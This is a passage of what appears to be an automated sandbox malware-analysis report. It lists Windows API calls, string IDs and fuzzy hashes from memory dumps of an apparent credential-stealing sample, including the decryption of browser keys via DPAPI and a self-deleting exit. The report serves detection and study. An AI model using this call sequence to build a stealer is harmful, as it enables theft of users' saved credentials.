                          • Part of subcall function 040B0CC7: lstrcat.KERNEL32(?,00000000), ref: 040B0EC4
                          • Part of subcall function 040B0CC7: lstrcat.KERNEL32(?,00420D80), ref: 040B0ED6
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        • memcmp.MSVCRT(?,00421114,00000003), ref: 040AA116
                        • memset.MSVCRT ref: 040AA14F
                        • LocalAlloc.KERNEL32(00000040,?), ref: 040AA1A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                        • String ID: @
                        • API String ID: 1977917189-2766056989
                        • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                        • Instruction ID: b2eeb875bddab68cfbd1641f7a1f02af3307542a8a7eb18993bf5fcc7c2985ec
                        • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                        • Instruction Fuzzy Hash: 06613931B00248ABEB24EFE8CD95FED77B5AF44308F408118E94AAB590DB747A15CF95
                        APIs
                        • strtok_s.MSVCRT ref: 00410DB8
                        • strtok_s.MSVCRT ref: 00410EFD
                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,024A5C80,?,0042110C,?,00000000), ref: 0041A82B
                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: strtok_s$lstrcpylstrlen
                        • String ID:
                        • API String ID: 348468850-0
                        • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                        • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                        • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                        • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                          • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                          • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                        • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                          • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                          • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                          • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                          • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 3731072634-738592651
                        • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                        • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                        • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                        • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CodeInfoPageValidmemset
                        • String ID:
                        • API String ID: 703783727-0
                        • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                        • Instruction ID: 8ce912bfb2b6a3c0cbbea398dcde354e4b5401b22da50113d40542c719704cc5
                        • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                        • Instruction Fuzzy Hash: D231E930A0C291DAF7658F74CC542F97FE09B45315B0841AED8D2EF191D278E405D7D9
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 040B6BD3
                        • sscanf.NTDLL ref: 040B6C00
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 040B6C19
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 040B6C27
                        • ExitProcess.KERNEL32 ref: 040B6C41
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                        • Instruction ID: 6f71091dbe6cec70548dfeda061be9c758d067e00736cdd836620c2d3115940c
                        • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                        • Instruction Fuzzy Hash: 4B21E7B5D14208ABDF08EFE4D9459EEB7B6FF48304F04852EE406B3250EB356604CBA9
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                        • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,024A99D8,00000000,00020119,?), ref: 00417E5E
                        • RegQueryValueExA.ADVAPI32(?,024DD6A0,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                        • RegCloseKey.ADVAPI32(?), ref: 00417E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3466090806-0
                        • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                        • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                        • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                        • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 040B809E
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040B80A5
                        • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 040B80C5
                        • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 040B80E6
                        • RegCloseKey.ADVAPI32(?), ref: 040B80F9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                        • Instruction ID: 96c5565af416776a8a6e4d922ae1c30666a96633a0e9cbd333cdca9160e386e4
                        • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                        • Instruction Fuzzy Hash: B4116DB6A84209BBD710DFD4DC4AFAFB7BDEB45700F008119F615A7290D77468008BA2
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 040B799B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040B79A2
                        • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,040B7920), ref: 040B79C2
                        • RegQueryValueExA.ADVAPI32(040B7920,00420AAC,00000000,00000000,?,000000FF), ref: 040B79E1
                        • RegCloseKey.ADVAPI32(040B7920), ref: 040B79EB
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                        • Instruction ID: e4cadee69631d521f2e95121bee0af9410f6813621c68f5cf0e0faa3361d2e94
                        • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                        • Instruction Fuzzy Hash: A40144B9A40308FFEB10DFE0DC49FAEB7B9EB44705F104159FA05A7280D67465008F91
                        APIs
                        • StrStrA.SHLWAPI(024DCB98,?,?,?,0041140C,?,024DCB98,00000000), ref: 0041926C
                        • lstrcpyn.KERNEL32(0064AB88,024DCB98,024DCB98,?,0041140C,?,024DCB98), ref: 00419290
                        • lstrlenA.KERNEL32(?,?,0041140C,?,024DCB98), ref: 004192A7
                        • wsprintfA.USER32 ref: 004192C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                        • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                        • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                        • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                        • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                        • RegCloseKey.ADVAPI32(?), ref: 004012FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3466090806-0
                        • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                        • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                        • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                        • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 040A151B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040A1522
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 040A153E
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 040A155C
                        • RegCloseKey.ADVAPI32(?), ref: 040A1566
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                        • Instruction ID: 657df05b0dc9b644e4283646bca094419e6f485499820d88abc285ef9b7903a5
                        • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                        • Instruction Fuzzy Hash: D0011DBDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D674AA018F91
                        APIs
                        • __getptd.LIBCMT ref: 0041C74E
                          • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                          • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                        • __getptd.LIBCMT ref: 0041C765
                        • __amsg_exit.LIBCMT ref: 0041C773
                        • __lock.LIBCMT ref: 0041C783
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                        • String ID:
                        • API String ID: 938513278-0
                        • Opcode ID: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                        • Instruction ID: 747b7d94d78dcab7bc4ad9ba185e37b4c367e78d81b7dca89f1d9f587bf674ed
                        • Opcode Fuzzy Hash: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                        • Instruction Fuzzy Hash: EBF09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                        APIs
                        • __getptd.LIBCMT ref: 040BC9B5
                          • Part of subcall function 040BC206: __getptd_noexit.LIBCMT ref: 040BC209
                          • Part of subcall function 040BC206: __amsg_exit.LIBCMT ref: 040BC216
                        • __getptd.LIBCMT ref: 040BC9CC
                        • __amsg_exit.LIBCMT ref: 040BC9DA
                        • __lock.LIBCMT ref: 040BC9EA
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 040BC9FE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                        • String ID:
                        • API String ID: 938513278-0
                        • Opcode ID: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                        • Instruction ID: b4a11c7d6be46aef2f56712529e079aa66b84805e8d0ea0af989861a2ead82bb
                        • Opcode Fuzzy Hash: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                        • Instruction Fuzzy Hash: B5F06D32A487119BF761BBA8980ABDD33A0AF0072CF14015ED8D4B66D0DB647541DBDE
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,024D9B50), ref: 0041079A
                        • StrCmpCA.SHLWAPI(00000000,024D99E0), ref: 00410866
                        • StrCmpCA.SHLWAPI(00000000,024D9A50), ref: 0041099D
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: `_A
                        • API String ID: 3722407311-2339250863
                        • Opcode ID: adf29671ce65ade073c3051981e201f5f0d13682d3ba44de7957ea85e479774a
                        • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                        • Opcode Fuzzy Hash: adf29671ce65ade073c3051981e201f5f0d13682d3ba44de7957ea85e479774a
                        • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,024D9B50), ref: 0041079A
                        • StrCmpCA.SHLWAPI(00000000,024D99E0), ref: 00410866
                        • StrCmpCA.SHLWAPI(00000000,024D9A50), ref: 0041099D
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: `_A
                        • API String ID: 3722407311-2339250863
                        • Opcode ID: 81950366ffcbbcdde432f001d7dc92a417181035050c38d9f2a7a554d623803e
                        • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                        • Opcode Fuzzy Hash: 81950366ffcbbcdde432f001d7dc92a417181035050c38d9f2a7a554d623803e
                        • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                        • ExitProcess.KERNEL32 ref: 00416755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: b4cd0edc391b5ae1f7ca76f0c70161f1b78b8fd1119a06bee71e5bdfafbbf1ad
                        • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                        • Opcode Fuzzy Hash: b4cd0edc391b5ae1f7ca76f0c70161f1b78b8fd1119a06bee71e5bdfafbbf1ad
                        • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 040B68CA
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                        • ShellExecuteEx.SHELL32(0000003C), ref: 040B698D
                        • ExitProcess.KERNEL32 ref: 040B69BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                        • Instruction ID: 4c6abe60d9bd2103bc5cf1089bc35b8569d73fced2b0a9ff0185ee9c7393d3b0
                        • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                        • Instruction Fuzzy Hash: 89314FB1901218ABEB14EBA0DD95FDEB779AF44308F404189E34576190DF747B88CF99
                        APIs
                        • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID: @Jn@$Jn@$Jn@
                        • API String ID: 544645111-1180188686
                        • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                        • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                        • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                        • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • lstrcatA.KERNEL32(00000000), ref: 0041A982
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
